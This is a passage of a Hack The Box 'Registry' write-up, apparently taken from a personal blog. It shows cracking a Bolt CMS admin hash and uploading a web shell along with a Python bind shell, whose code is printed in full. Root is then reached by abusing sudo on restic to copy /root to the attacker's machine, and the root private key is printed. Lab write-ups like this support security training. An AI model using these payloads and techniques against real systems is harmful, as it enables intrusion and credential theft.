 debug1: Will attempt key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit
 debug1: SSH2_MSG_EXT_INFO received
 debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521>
 debug1: SSH2_MSG_SERVICE_ACCEPT received
 debug1: Authentications that can continue: publickey,password
 debug1: Next authentication method: publickey
 debug1: Offering public key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit
 debug1: Server accepts key: id_rsa RSA SHA256:XYmIvRC1pWwn6TnuAismBkezuFTeVa0viiqKVkR36w4 explicit
 Enter passphrase for key 'id_rsa':
 debug1: Authentication succeeded (publickey).
 Authenticated to registry.htb ([10.10.10.159]:22).
 debug1: channel 0: new [client-session]
 debug1: Requesting no-more-sessions@openssh.com
 debug1: Entering interactive session.
 debug1: pledge: network
 debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
 debug1: Sending environment.
 debug1: Sending env LANG = en_US.utf8
 Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
 
 System information as of Sat Apr  4 01:14:31 UTC 2020
 
 System load:  0.0               Users logged in:                1
 Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
 Memory usage: 39%               IP address for br-1bad9bd75d17: 172.18.0.1
 Swap usage:   0%                IP address for docker0:         172.17.0.1
 Processes:    163
 Last login: Sat Apr  4 00:57:04 2020 from 10.10.15.8
 bolt@bolt:~$ whoami & hostname
 [1] 6324
 bolt
 bolt
 bolt@bolt:~$
 
 
 | 
and Finally i can now get the user.txt
| 
 Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
 
 System information as of Sat Apr  4 01:14:31 UTC 2020
 
 System load:  0.0               Users logged in:                1
 Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
 Memory usage: 39%               IP address for br-1bad9bd75d17: 172.18.0.1
 Swap usage:   0%                IP address for docker0:         172.17.0.1
 Processes:    163
 Last login: Sat Apr  4 00:57:04 2020 from 10.10.15.8
 bolt@bolt:~$ whoami & hostname
 [1] 6324
 bolt
 bolt
 bolt@bolt:~$ ls
 user.txt
 [1]+  Done                    whoami
 bolt@bolt:~$ cat user.txt
 ytc0y[-----------------------]3ywzi
 bolt@bolt:~$
 
 
 | 
Exploitation
So it’s time to do enumeration again the bolt user shell, I tried LinPEAS to enumerate the shell, then I found out that there was a CMS installed in the machine which is "Bolt CMS"
wget, curl was not working, so I try netcat to transfer the linpeash.sh
| 
 
 bolt@bolt:/tmp$ nc -l -p 1234 > linpeas.sh
 
 
 root in boxes/Registry/docker
 ❯ nc -w 3 10.10.10.159 1234 < linpeas.sh
 
 
 
 bolt@bolt:/tmp$ chmod +x linpeas.sh
 bolt@bolt:/tmp$ bash linpeas.sh
 
 
 | 
| # bash
 ====================================( Basic information )=====================================
 OS: Linux version 4.15.0-65-generic (buildd@lgw01-amd64-006) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019
 User & Groups: uid=1001(bolt) gid=1001(bolt) groups=1001(bolt)
 Hostname: bolt
 Writable folder: /dev/shm
 [+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
 [+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
 [+] nmap is available for network discover & port scanning, you should use it yourself
 
 
 | 
BOLT CMS WEBSITE
Going deep of recon I see db.sqlite which contains a password hash, and installed CMS Website at /var/www/html directory.
| # bash
 [+] Looking for tables inside readable .db/.sqlite files (limit 100)
 -> Extracting tables from /var/www/html/bolt/vendor/codeception/codeception/tests/data/sqlite.db (limit 20)
 -> Extracting tables from /var/www/html/bolt/tests/phpunit/unit/resources/db/bolt.db (limit 20)
 --> Found for interesting column names in bolt_authtoken (output limit 10)
 CREATE TABLE bolt_authtoken (id INTEGER NOT NULL, user_id INTEGER DEFAULT NULL, username VARCHAR(32) DEFAULT NULL, token VARCHAR(128) NOT NULL, salt VARCHAR(128) NOT NULL, lastseen DATETIME DEFAULT NULL, ip VARCHAR(45) DEFAULT NULL, useragent VARCHAR(128) DEFAULT NULL, validity DATETIME DEFAULT NULL, PRIMARY KEY(id))
 --> Found for interesting column names in bolt_users (output limit 10)
 CREATE TABLE bolt_users (id INTEGER NOT NULL, username VARCHAR(32) NOT NULL, password VARCHAR(128) NOT NULL, email VARCHAR(254) NOT NULL, lastseen DATETIME DEFAULT NULL, lastip VARCHAR(45) DEFAULT NULL, displayname VARCHAR(32) NOT NULL, stack CLOB NOT NULL --(DC2Type:json)
 , enabled BOOLEAN DEFAULT '1' NOT NULL, shadowpassword VARCHAR(128) DEFAULT NULL, shadowtoken VARCHAR(128) DEFAULT NULL, shadowvalidity DATETIME DEFAULT NULL, failedlogins INTEGER DEFAULT 0 NOT NULL, throttleduntil DATETIME DEFAULT NULL, roles CLOB NOT NULL --(DC2Type:json)
 , PRIMARY KEY(id))
 
 -> Extracting tables from /var/www/html/bolt/app/database/bolt.db (limit 20)
 --> Found for interesting column names in bolt_authtoken (output limit 10)
 CREATE TABLE bolt_authtoken (id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, user_id INTEGER DEFAULT NULL, username VARCHAR(32) DEFAULT NULL, token VARCHAR(128) NOT NULL, salt VARCHAR(128) NOT NULL, lastseen DATETIME DEFAULT NULL, ip VARCHAR(45) DEFAULT NULL, useragent VARCHAR(128) DEFAULT NULL, validity DATETIME DEFAULT NULL)
 9, 1, None, 2e3f688aab59a4586f54fbd3f284eb3b941b0580142356d840c7e582801b6388, 33aa58459b97be252a29fd98e3cdf81b, 2020-04-04 18:48:37, 10.10.15.104, Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0, 2020-04-18 18:48:37
 --> Found for interesting column names in bolt_users (output limit 10)
 CREATE TABLE bolt_users (id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, username VARCHAR(32) NOT NULL, password VARCHAR(128) NOT NULL, email VARCHAR(254) NOT NULL, lastseen DATETIME DEFAULT NULL, lastip VARCHAR(45) DEFAULT NULL, displayname VARCHAR(32) NOT NULL, stack CLOB NOT NULL --(DC2Type:json)
 , enabled BOOLEAN DEFAULT '1' NOT NULL, shadowpassword VARCHAR(128) DEFAULT NULL, shadowtoken VARCHAR(128) DEFAULT NULL, shadowvalidity DATETIME DEFAULT NULL, failedlogins INTEGER DEFAULT 0 NOT NULL, throttleduntil DATETIME DEFAULT NULL, roles CLOB NOT NULL --(DC2Type:json)
 )
 1, admin, $2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK, bolt@registry.htb, 2020-04-04 22:00:22, 10.10.15.139, Admin, ["files:
 
 
 [+] Web files?(output limit)
 /var/www/:
 total 16K
 drwxr-xr-x  4 root     root     4.0K May 26  2019 .
 drwxr-xr-x 14 root     root     4.0K May 19  2019 ..
 drwx------  3 root     root     4.0K May 26  2019 .cache
 drwxrwxr-x  4 www-data www-data 4.0K Apr  4 22:01 html
 
 /var/www/html:
 total 32K
 drwxrwxr-x  4 www-data www-data 4.0K Apr  4 22:01 .
 
 
 | 
I visited the bolt website at registry.htb/bolt

Then I decrypt the password hasha using John The Ripper so:
| # bash
 root in htb/boxes/Registry via 🐘 v7.3.15
 ❯ john bolt-hash --wordlist=/usr/share/wordlists/rockyou.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
 Cost 1 (iteration count) is 1024 for all loaded hashes
 Will run 4 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 strawberry       (admin)
 1g 0:00:00:05 DONE (2020-04-05 06:54) 0.1996g/s 71.85p/s 71.85c/s 71.85C/s strawberry..brianna
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed
 
 root in htb/boxes/Registry via 🐘 v7.3.15 took 9s
 ❯
 
 
 | 
after only 9 seconds i get the password strawberry and login this into Bolt CMS
BOLT CMS LOGIN PAGE

After login it display the dashboard which has a lot of stuffs.
BOLT CMS DASHBOARD PAGE

I search on the bolt cms exploit and I found this article it is the same version on the bolt cms installed on the registry machine.
I tried to follow the exploitation but it doesn’t work. Also this part was really hard because theres a cron job inside that will erase everything you modified to I need to be fast as much.
So this is the default Config.yml in Bolt CMS Configuration where you can edit accept_file_types.

In the configuration file i’ll put php, and py extensions so I can upload my webshells. Why I need to upload 2 different file ? PHP Reverse Shell is not working so I search for other webshell that I can execute and get remote inside on the webserver.

Until i found out that I can use Bind Shell go gain remote shell. So I created my simple bind shell with python. this is similar to this one
| 
 
 
 
 
 import os
 import pty
 import socket
 
 PORT = 9001
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.bind(('', PORT))
 s.listen(1)
 (rem, addr) = s.accept()
 os.dup2(rem.fileno(),0)
 os.dup2(rem.fileno(),1)
 os.dup2(rem.fileno(),2)
 os.putenv("HISTFILE",'/dev/null')
 pty.spawn("/bin/bash")
 s.close()
 
 
 | 
save it ! then I used p0wnyShell so I can run the bind shell (shell.py) and connect it with my Kali Linux so. after done setting up I’ uploaded it into File Management inside the Bolt CMS.

now I will open the p0wnyshell and run the shell.py

You will see that the port is in already in use but it’s okay I can still connect with my Kali Linux, and Now I’m on the shell of www-data
| # bash
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
 ❯ nc -v 10.10.10.159 9001
 registry.htb [10.10.10.159] 9001 (?) open
 www-data@bolt:~/html/bolt/files$ ls
 ls
 www-data@bolt:~/html/bolt/files$ whoami
 whoami
 www-data
 
 
 | 
Privilege Escalation
As a www-data user we can restic sudo
| # bash
 www-data@bolt:~/html/bolt/files$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on bolt:
 env_reset, exempt_group=sudo, mail_badpass,
 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
 User www-data may run the following commands on bolt:
 (root) NOPASSWD: /usr/bin/restic backup -r rest*
 www-data@bolt:~/html/bolt/files$
 
 
 | 
So as we have privilege for running the restic we can get the root.
RESTIC BACKUP PROGRAM
So what is Restic ?
Restic is a backup program that is fast, efficient and secure. It supports the three major operating systems (Linux, macOS, Windows) and a few smaller ones (FreeBSD, OpenBSD).
Since we have privilege by running restic we can backup the root directory and get the administrator shell.
First I install restic into may Kali Linux.
| 
 sudo apt-get install restic
 
 
 | 
after the installation, I will create backup folder and set a password on that.
| 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 4m1s
 ❯ mkdir backups
 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
 ❯ restic init -r ./backups/
 enter password for new repository:
 enter password again:
 created restic repository 6f893c5da1 at ./backups/
 
 Please note that knowledge of your password is required to access
 the repository. Losing your password means that your data is
 irrecoverably lost.
 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 13s
 ❯
 
 
 | 
Looking at the backups directories
| 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 13s
 ❯ ls backups/
 config  data  index  keys  locks  snapshots
 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
 ❯
 
 
 | 
SETTING UP THE SERVER
Now I will install docker to my machine and start a server at port 8000
| 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
 ❯ sudo apt install docker.io
 
 
 | 
Now i will run restic server on my machine and set the path at /backups so:
| 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
 ❯ docker run -p 8000:8000 -v /root/htb/boxes/Registry/backups/:/backups -it restic/rest-server sh
 /
 rest-server 0.9.7 compiled with go1.10 on linux/amd64
 Data directory: /backups
 Authentication disabled
 Private repositories disabled
 Starting server on :8000
 
 
 | 
after it’s successfully start the server we will go back the the bolt user shell and set reverse SSH so:
| 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
 ❯ ssh -i id_rsa -R 8000:127.0.0.1:8000 bolt@10.10.10.159
 Enter passphrase for key 'id_rsa':
 Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
 
 System information as of Sun Apr  5 01:51:21 UTC 2020
 
 System load:  0.0               Users logged in:                1
 Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
 Memory usage: 37%               IP address for br-1bad9bd75d17: 172.18.0.1
 Swap usage:   1%                IP address for docker0:         172.17.0.1
 Processes:    164
 Last login: Sun Apr  5 01:15:52 2020 from 10.10.15.43
 bolt@bolt:~$
 
 
 | 
CREATING BACKUPS
Looks good ! Now I can create backups in www-data, I will choose to backup /root/ folder because this what I need to ge the administrator so:
| 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
 ❯ nc -v 10.10.10.159 12346
 registry.htb [10.10.10.159] 12346 (?) open
 www-data@bolt:~/html/bolt/files$
 
 www-data@bolt:~/html/bolt/files$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8000/ /root
 </restic backup -r rest:http://127.0.0.1:8000/ /root
 enter password for repository: -------------
 
 password is correct
 found 2 old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them
 scan [/root]
 scanned 10 directories, 14 files in 0:00
 [0:01] 100.00%  28.066 KiB / 28.066 KiB  24 / 24 items  0 errors  ETA 0:00
 duration: 0:01
 snapshot 4d60990a saved
 www-data@bolt:~/html/bolt/files$
 
 
 | 
Now it’s successfully saved on snapshot, back into my machine I will restore the backup I created.
| 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
 ❯ restic -r backups/ restore latest --target restore/
 enter password for repository:
 repository 6f893c5d opened successfully, password is correct
 created new cache in /root/.cache/restic
 restoring <Snapshot 4d60990a of [/root] at 2020-04-05 01:58:02.792216091 +0000 UTC by root@bolt> to restore/
 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17 took 4s
 ❯
 
 
 | 
Success ! Now it will create /restore folder which contains all the files we need, from there I can get the root.txt
| 
 root in htb/boxes/Registry via 🐘 v7.3.15 via 🐍 v2.7.17
 ❯ cd restore
 
 root in boxes/Registry/restore
 ❯ ls
 root
 
 root in boxes/Registry/restore
 ❯ cd root
 
 root in Registry/restore/root
 ❯ ls
 config.yml  cron.sh  root.txt
 
 root in Registry/restore/root
 ❯ cat root.txt
 ntrk[---------------------]kztgw
 
 
 | 
isn’t enough we need the administrator shell, i will use the id_rsa inside the .ssh so:
| 
 root in Registry/restore/root
 ❯ ls -la
 total 76
 drwx------ 7 root root  4096 Oct 21 18:37 .
 drwx------ 3 root root  4096 Apr  5 09:59 ..
 lrwxrwxrwx 1 root root     9 May 29  2019 .bash_history -> /dev/null
 -rw-r--r-- 1 root root  3106 Sep 27  2019 .bashrc
 drwx------ 2 root root  4096 Sep 27  2019 .cache
 drwxr-xr-x 3 root root  4096 Sep 27  2019 .config
 -rw-r--r-- 1 root root 20999 Oct 21 18:04 config.yml
 -rw-r--r-- 1 root root   118 Oct 21 18:37 cron.sh
 drwx------ 3 root root  4096 Sep 27  2019 .gnupg
 drwxr-xr-x 3 root root  4096 Oct  9 04:57 .local
 -rw-r--r-- 1 root root   148 Aug 17  2015 .profile
 -r-------- 1 root root    33 Sep 27  2019 root.txt
 -rw-r--r-- 1 root root    66 Oct 21 18:00 .selected_editor
 drwxr-xr-x 2 root root  4096 Oct 17 17:58 .ssh
 -rw-r--r-- 1 root root   215 Oct 21 16:59 .wget-hsts
 
 root in Registry/restore/root
 ❯ cd .ssh
 
 root in restore/root/.ssh
 ❯ ls
 authorized_keys  id_rsa  id_rsa.pub
 
 root in restore/root/.ssh
 ❯ chmod 600 id_rsa
 
 
 root in restore/root/.ssh
 ❯ cat id_rsa
 -----BEGIN RSA PRIVATE KEY-----
 MIIEowIBAAKCAQEAmiGiXpswTyHhjgC55jHRWlGX1asEMyDFfkVwhuNohv/4cQKm
 cJB/3psQocosq+GMh9Y/uRPUgMcDnrTaNYOdkPS+QLd8vcFKSwSewH1w4/AYLuci
 4k71qYsJlkcS2Pb0PqEcpodmXf4OBdTCiCCnjgGhOcvPpKMSCb1vy2Yo+A+eHzKp
 1S48LgJRLKU1sGe0KE4MC8g7qpF7NSKOCW69z5KaoopQA3jPxnW17WE9PdGZQvqX
 4/Mf9DGdeUrejRlX0BI2EGiZhPKwwKxqIHLRpw4pR4+OjR1sOkAA7UWtMYn/3cs+
 IS3L75/i5Qsr0cMCtZ/hQAKtjpPoCCe1qHp7CQIDAQABAoIBAFlvYtQaoLGKK2NG
 sJgOGDicV8o37bvtLCvVBzJ+Ck0rgnGw4/s1Hb2BpOj8c2dY/T5k55zxEMGYuVUC
 BAxBTtCp8yuCTPOekQluqN9w6myZCK9Ol0NSJeI3N1zn6NvUkG0293T55EBuBp0D
 k82BhTg1YeQzi00xAmp8bb5MjUFCiCbSFH1MMpY/9itg1b3mqx7UlyDldMM9UdKH
 HS9aZmAzY5/U6wEtJi4mx3QIoVahytMgcxd7qoicCYyVm73HFQsZ58L+5QflygH4
 dpbptPOnNmLUkWFXcK3bmlmrEyuafS6z68oDFeAZz8Dg2D2qXWfhdlN4GVstlxSI
 skH5sAECgYEAySOp7KOZJVpstF8zjn+/OZowEF4iSHnaGAX64B6GgWwXQURn3wVq
 tlqDO5m5vIexe2tyFDSVe5otWtzQvbPNkjpD7/kglGTbT9PCU/Dgb5pTmOxBPi9a
 1W8+q7lwiXLIRb4NB+BqDz0yI924BnZt9rukzm9650Rrbala0HZxhIECgYEAxCux
 RQUzgSx7YdzThvB8sAzQJj2gNAbwEA9Y56I0pQLvTNoGQY8V8IYBrlvW935kLfcf
 xz8j5VNt1BizDQjG8j5FfVcU6VE98/OMgn4XKd6nl9sOoQBXzssjUF+3AIhn5DsK
 Q/IymTZEmhfGAt9k6dE4WH8qffea/E7qJY+pkokCgYAdatLiYjb2yJfXdYkD0Vk1
 YoCfFDVtZizokI9VkgFYEmgASrHqY09tJiXFZMFOeoYRp/BCVkJ6ll0Fyf/Zjt+F
 AHKJOWVzbqDItw7X2gXpLKgHWJ5eKuzdBG0lDnUQFTKHSLl9Kmw4mFmp9zZ/83g3
 us/qxVEzW8Vef4Nhs8D8gQKBgDtsMMqDhNKAMu+2AK1Dc8GwX+z1he28nEOBIqEn
 1WKWvP4+nN6HBVJShXfXggp+UsJJtWqZiboRx5cT1EkCe6Etk8cf9cmnPmkDQXDV
 2RZpx8KMLKZAgFi31/6kv759k1rjN3zVhNY8RhOXV/fOy7a4FaVY//ogYuZC0VKH
 bgphAoGBAKGyJQe/b6rUkpzvIBxbGt9Hw1kpLr07VCdPQb1MCdCU4l+mlDD5NBN3
 mzygp6MTi+TvN3PhxlfAmUPbz0qw+3aX95pt2cQ492wLOe+RsVsKtvDTgH/2+DUe
 2qnb+Jd6ERs3jmBeuuavC2O5ajhyLt1xL3uF5UVpoenCYlYuOvL4
 -----END RSA PRIVATE KEY-----
 
 root in restore/root/.ssh
 ❯
 
 
 | 
GET THE ADMIN SHELL
| 
 root in restore/root/.ssh
 ❯ ssh -i id_rsa root@registry.htb
 Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
 
 System information as of Sun Apr  5 02:06:19 UTC 2020
 
 System load:  0.0               Users logged in:                1
 Usage of /:   5.7% of 61.80GB   IP address for eth0:            10.10.10.159
 Memory usage: 38%               IP address for br-1bad9bd75d17: 172.18.0.1
 Swap usage:   1%                IP address for docker0:         172.17.0.1
 Processes:    169
 Last login: Mon Oct 21 09:53:48 2019
 root@bolt: whoami
 root
 root@bolt:~#
 
 
 | 
If you liked my writeup please leave a respect on my Profile

Referrences:
Anatomy of a hack: Docker Registry
Docker Registry
Exploiting Docker Registry
p0wnyshell
Bind Shell